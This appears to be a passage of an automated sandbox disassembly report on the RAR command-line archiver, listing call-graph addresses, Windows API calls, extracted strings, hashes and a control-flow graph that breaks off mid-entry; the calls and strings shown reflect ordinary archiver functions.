_invalid_parameter_noinfo 39536->39549 39550 7ff625717d98 60 API calls 2 library calls 39537->39550 39540 7ff625717ef8 39540->39514 39542 7ff6256c7b61 GetConsoleMode 39541->39542 39543 7ff6256c7a9e 39541->39543 39542->39543 39543->39519 39544->39526 39545->39525 39546->39529 39547->39522 39548->39536 39549->39540 39550->39540 39551 7ff62571231c 39552 7ff62571238c 39551->39552 39553 7ff625712342 GetModuleHandleW 39551->39553 39564 7ff625716938 EnterCriticalSection 39552->39564 39553->39552 39559 7ff62571234f 39553->39559 39555 7ff625716998 fflush LeaveCriticalSection 39557 7ff625712460 39555->39557 39556 7ff625712396 39560 7ff625712410 39556->39560 39562 7ff6257143b8 16 API calls 39556->39562 39558 7ff62571246c 39557->39558 39561 7ff625712488 11 API calls 39557->39561 39559->39552 39565 7ff6257124d4 GetModuleHandleExW 39559->39565 39560->39555 39561->39558 39562->39560 39566 7ff6257124fe GetProcAddress 39565->39566 39567 7ff625712525 39565->39567 39566->39567 39568 7ff625712518 39566->39568 39569 7ff62571252f FreeLibrary 39567->39569 39570 7ff625712535 39567->39570 39568->39567 39569->39570 39570->39552 39571 7ff6256b3b53 39572 7ff6256b3b64 39571->39572 39621 7ff6256d1e80 39572->39621 39573 7ff6256b3c09 39633 7ff6256d23f0 39573->39633 39575 7ff6256b3bb6 39575->39573 39576 7ff6256b3c18 39575->39576 39577 7ff6256b3c01 39575->39577 39638 7ff6256b8050 157 API calls 39576->39638 39579 7ff6256d1c24 12 API calls 39577->39579 39579->39573 39580 7ff6256b3c3d 39639 7ff6256b8010 13 API calls 39580->39639 39581 7ff6256b3ccc 39602 7ff6256b3c90 39581->39602 39646 7ff6256d2414 61 API calls 39581->39646 39584 7ff6256b3c45 39587 7ff6256b3c54 39584->39587 39640 7ff6256ccba8 75 API calls 39584->39640 39586 7ff6256b3cf9 39647 7ff6256d1998 138 API calls 39586->39647 39641 7ff6256ba9d4 186 API calls wcschr 39587->39641 39591 7ff6256b3d10 39594 7ff6256d18ac 15 API calls 39591->39594 39592 7ff6256b3c5c 39642 7ff6256b93ac 8 API calls 39592->39642 39594->39602 39595 7ff6256b3c66 39597 7ff6256b3c77 39595->39597 39643 7ff6256cca40 61 API calls _CxxThrowException 39595->39643 39644 7ff6256b8090 8 API calls 39597->39644 39600 7ff6256b3c7f 39600->39602 39645 7ff6256cca40 61 API calls _CxxThrowException 39600->39645 39648 7ff6256fd400 48 API calls 39602->39648 39622 7ff6256d1e95 pre_c_initialization 39621->39622 39623 7ff6256d1ecb CreateFileW 39622->39623 39624 7ff6256d1fb8 39623->39624 39625 7ff6256d1f59 GetLastError 39623->39625 39626 7ff6256d1ff7 39624->39626 39628 7ff6256d1fd9 SetFileTime 39624->39628 39627 7ff6256e4534 10 API calls 39625->39627 39630 7ff62570a610 _UnwindNestedFrames 8 API calls 39626->39630 39629 7ff6256d1f74 39627->39629 39628->39626 39629->39624 39631 7ff6256d1f78 CreateFileW GetLastError 39629->39631 39632 7ff6256d203a 39630->39632 39631->39624 39632->39575 39649 7ff6256d24e8 39633->39649 39636 7ff6256d240e 39636->39581 39638->39580 39639->39584 39641->39592 39642->39595 39643->39597 39644->39600 39645->39602 39646->39586 39647->39591 39655 7ff6256d1af0 39649->39655 39652 7ff6256d23f9 39652->39636 39654 7ff6256cca40 61 API calls _CxxThrowException 39652->39654 39654->39636 39656 7ff6256d1b01 pre_c_initialization 39655->39656 39657 7ff6256d1b6f CreateFileW 39656->39657 39658 7ff6256d1b68 39656->39658 39657->39658 39659 7ff6256d1be1 39658->39659 39660 7ff6256e4534 10 API calls 39658->39660 39663 7ff62570a610 _UnwindNestedFrames 8 API calls 39659->39663 39661 7ff6256d1bb3 39660->39661 39661->39659 39662 7ff6256d1bb7 CreateFileW 39661->39662 39662->39659 39664 7ff6256d1c14 39663->39664 39664->39652 39665 7ff6256cca08 10 API calls 39664->39665 39665->39652 39666 7ff625712450 39673 7ff625713734 39666->39673 39668 7ff625712455 39669 7ff625716998 fflush LeaveCriticalSection 39668->39669 39670 7ff625712460 39669->39670 39671 7ff62571246c 39670->39671 39672 7ff625712488 11 API calls 39670->39672 39672->39671 39678 7ff625715630 35 API calls 3 library calls 39673->39678 39675 7ff62571373f 39679 7ff625714a1c 35 API calls abort 39675->39679 39678->39675 39680 7ff6256b7a5b 39681 7ff6256b7a60 39680->39681 39682 7ff6256c9be0 14 API calls 39681->39682 39684 7ff6256b7af7 39681->39684 39682->39684 39683 7ff6256b7bda 39686 7ff6256bb540 147 API calls 39683->39686 39684->39683 39713 7ff6256d1e1c GetFileTime 39684->39713 39687 7ff6256b7bf8 39686->39687 39690 7ff6256b7c3e 39687->39690 39714 7ff625709b98 216 API calls 3 library calls 39687->39714 39689 7ff6256bb540 147 API calls 39692 7ff6256b7c9c 39689->39692 39690->39689 39691 7ff6256b7f89 39692->39691 39715 7ff6256d6378 39692->39715 39694 7ff6256b7cd7 39695 7ff6256d6378 4 API calls 39694->39695 39697 7ff6256b7cf3 39695->39697 39696 7ff6256b7de1 39703 7ff6256b7e4e 39696->39703 39720 7ff6256e98dc 39696->39720 39697->39696 39699 7ff6256b7d38 39697->39699 39700 7ff6256b7d59 39697->39700 39702 7ff62570a444 new 4 API calls 39699->39702 39701 7ff62570a444 new 4 API calls 39700->39701 39707 7ff6256b7d42 std::bad_alloc::bad_alloc 39701->39707 39702->39707 39726 7ff6256b1204 48 API calls 39703->39726 39705 7ff6256b7eb3 39708 7ff6256b7edb 39705->39708 39727 7ff6256e9680 39705->39727 39707->39696 39719 7ff62570ba34 RtlPcToFileHeader RaiseException 39707->39719 39733 7ff6256d6424 8 API calls _UnwindNestedFrames 39708->39733 39711 7ff6256b7f56 39712 7ff6256bb540 147 API calls 39711->39712 39712->39691 39713->39683 39714->39690 39716 7ff6256d6396 39715->39716 39718 7ff6256d63a0 39715->39718 39717 7ff62570a444 new 4 API calls 39716->39717 39717->39718 39718->39694 39719->39696 39721 7ff6256e993c 39720->39721 39722 7ff6256e9926 39720->39722 39724 7ff6256c90b8 75 API calls 39721->39724 39723 7ff6256c90b8 75 API calls 39722->39723 39725 7ff6256e9934 39723->39725 39724->39725 39725->39703 39726->39705 39731 7ff6256e96a4 39727->39731 39728 7ff6256e97d7 39729 7ff6256d2574 126 API calls 39729->39731 39731->39728 39731->39729 39732 7ff625709b98 216 API calls 39731->39732 39734 7ff6256d6498 72 API calls new 39731->39734 39732->39731 39733->39711 39734->39731 39735 7ff625719c74 39736 7ff625719c7c 39735->39736 39737 7ff625719cbb 39736->39737 39739 7ff625719cac 39736->39739 39738 7ff625719cc5 39737->39738 39757 7ff62571ce08 32 API calls 2 library calls 39737->39757 39744 7ff625714b8c 39738->39744 39756 7ff625714f3c 15 API calls memcpy_s 39739->39756 39743 7ff625719cb1 memcpy_s 39745 7ff625714bab 39744->39745 39746 7ff625714ba1 39744->39746 39748 7ff625714bb0 39745->39748 39754 7ff625714bb7 __vcrt_getptd_noexit 39745->39754 39758 7ff625714ab4 39746->39758 39749 7ff625714a74 __vcrt_getptd_noexit 15 API calls 39748->39749 39751 7ff625714ba9 39749->39751 39750 7ff625714bf6 39765 7ff625714f3c 15 API calls memcpy_s 39750->39765 39751->39743 39753 7ff625714be0 RtlReAllocateHeap 39753->39751 39753->39754 39754->39750 39754->39753 39755 7ff6257136c0 new 2 API calls 39754->39755 39755->39754 39756->39743 39757->39738 39759 7ff625714aff 39758->39759 39763 7ff625714ac3 __vcrt_getptd_noexit 39758->39763 39766 7ff625714f3c 15 API calls memcpy_s 39759->39766 39761 7ff625714ae6 RtlAllocateHeap 39762 7ff625714afd 39761->39762 39761->39763 39762->39751 39763->39759 39763->39761 39764 7ff6257136c0 new 2 API calls 39763->39764 39764->39763 39765->39751 39766->39762
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                              • API String ID: 0-1628410872
                                                                                                                                                                                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction ID: 0e36fae1093347e29362ec549562b1be71e94bd071507bd62a5f3e829fb15dcd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7C2B372D0C1D281EE749F288D4C1BD26A1BB11F86F588135CA0ECA2E5DF6DED44E35A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                              • API String ID: 0-1660254149
                                                                                                                                                                                                                              • Opcode ID: ea2d57dfe965d8c2fab16aedae0a9ba2e2116d986d5da6652a9342f8451bbd18
                                                                                                                                                                                                                              • Instruction ID: f78d174bdde275872e4b78d39b33b09b9b77a58825d977b0d5ef6d4bd3ad5e95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea2d57dfe965d8c2fab16aedae0a9ba2e2116d986d5da6652a9342f8451bbd18
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E2B126A09AC285EF30EF25DC401FD27A1FB85B88F454136EA4D97BA6DF39D944D302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6256F4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6256CCC90), ref: 00007FF6256F4AF5
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F492E
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F496A
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4993
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F499F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                              • String ID: rarlng.dll
                                                                                                                                                                                                                              • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                              • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                              • Instruction ID: f38f8ee345829fd97db8587b964d0b60a439398bfc66831b09fdb30dd7e2a53e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A312E31B18A428AFF749F21EC412E92365FB45B85F804035EA4E82EA8DF3DE955D742

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D4736
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D476B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D477A
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D47A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D47B2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                                                                                                              • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction ID: bb8c7529caff9dd4caea1bd65560456c472867a8de510d7e15c15273a8413925
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D241C332B0968156EE789F25E8402E863A0FB49FB4F400731EA7D83BD5DF6CE9558701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction ID: 982dd9b8055b984cf9df29d8fbdd2606bd0fe9324e0d81119642be154d22b743
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C016D2AB4865082FF208F16A8443396761FBC4FD0F198035DE4D83BA8DF7DD9468705
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Char
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 751630497-0
                                                                                                                                                                                                                              • Opcode ID: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
                                                                                                                                                                                                                              • Instruction ID: 639024b886b643090ed2803526a9e0a130d4aa49885d7bfc0e7596e8cd2a0718
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9022A232A0868296EF24EF30D8411FE7BA1FB50B58F444035EA8DA76B9DE78ED41D741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 64e19a6c149fbf3ce18041e807eec97dd4e785c068965673d4e096d45633b1e4
                                                                                                                                                                                                                              • Instruction ID: 7bb26cb0565ffa9a8c33271a77ffac54741ac8a754a93abc46503114c6226830
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64e19a6c149fbf3ce18041e807eec97dd4e785c068965673d4e096d45633b1e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70711232A0668186DB54DF29E8053EC33D1FB88F98F144136DB5DCB3A9DF79A8418791

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 7ff6256f3ea8-7ff6256f3f03 call 7ff62570a5a0 call 7ff62570c8a0 640 7ff6256f3f05-7ff6256f3f3e GetModuleFileNameW call 7ff6256e4e14 call 7ff6256fa9c0 635->640 641 7ff6256f3f40-7ff6256f3f50 call 7ff6256fa9e8 635->641 645 7ff6256f3f55-7ff6256f3f79 call 7ff6256d1874 call 7ff6256d1e80 640->645 641->645 652 7ff6256f4692-7ff6256f46c5 call 7ff6256d18ac call 7ff62570a610 645->652 653 7ff6256f3f7f-7ff6256f3f89 645->653 654 7ff6256f3fae-7ff6256f3feb call 7ff62570ec70 * 2 653->654 655 7ff6256f3f8b-7ff6256f3fac call 7ff6256f11c0 * 2 653->655 668 7ff6256f3fef-7ff6256f3ff3 654->668 655->654 669 7ff6256f40f2-7ff6256f4112 call 7ff6256d22e0 call 7ff62570eb90 668->669 670 7ff6256f3ff9-7ff6256f402d call 7ff6256d2440 call 7ff6256d2150 668->670 669->652 681 7ff6256f4118-7ff6256f4131 call 7ff6256d2150 669->681 679 7ff6256f4033 670->679 680 7ff6256f40bc-7ff6256f40e2 call 7ff6256d22e0 670->680 682 7ff6256f403a-7ff6256f403e 679->682 680->668 692 7ff6256f40e8-7ff6256f40ec 680->692 689 7ff6256f4133-7ff6256f4136 681->689 690 7ff6256f4138-7ff6256f414b call 7ff62570eb90 681->690 685 7ff6256f4064-7ff6256f4069 682->685 686 7ff6256f4040-7ff6256f4044 682->686 693 7ff6256f406b-7ff6256f4070 685->693 694 7ff6256f4097-7ff6256f409f 685->694 686->685 691 7ff6256f4046-7ff6256f405e call 7ff625712290 686->691 697 7ff6256f416f-7ff6256f41b1 call 7ff6256fa900 call 7ff62570eb90 689->697 690->652 706 7ff6256f4151-7ff6256f416c call 7ff6256fd54c call 7ff62570eb88 690->706 707 7ff6256f40a3-7ff6256f40a7 691->707 708 7ff6256f4060 691->708 692->652 692->669 693->694 700 7ff6256f4072-7ff6256f4078 693->700 695 7ff6256f40a1 694->695 696 7ff6256f40b7 694->696 695->682 696->680 718 7ff6256f41b3-7ff6256f41bb call 7ff62570eb88 697->718 719 7ff6256f41c0-7ff6256f41d5 697->719 704 7ff6256f4093 700->704 705 7ff6256f407a-7ff6256f4091 call 7ff625711700 700->705 704->694 705->704 716 7ff6256f40a9-7ff6256f40b5 705->716 706->697 707->696 708->685 716->680 718->652 720 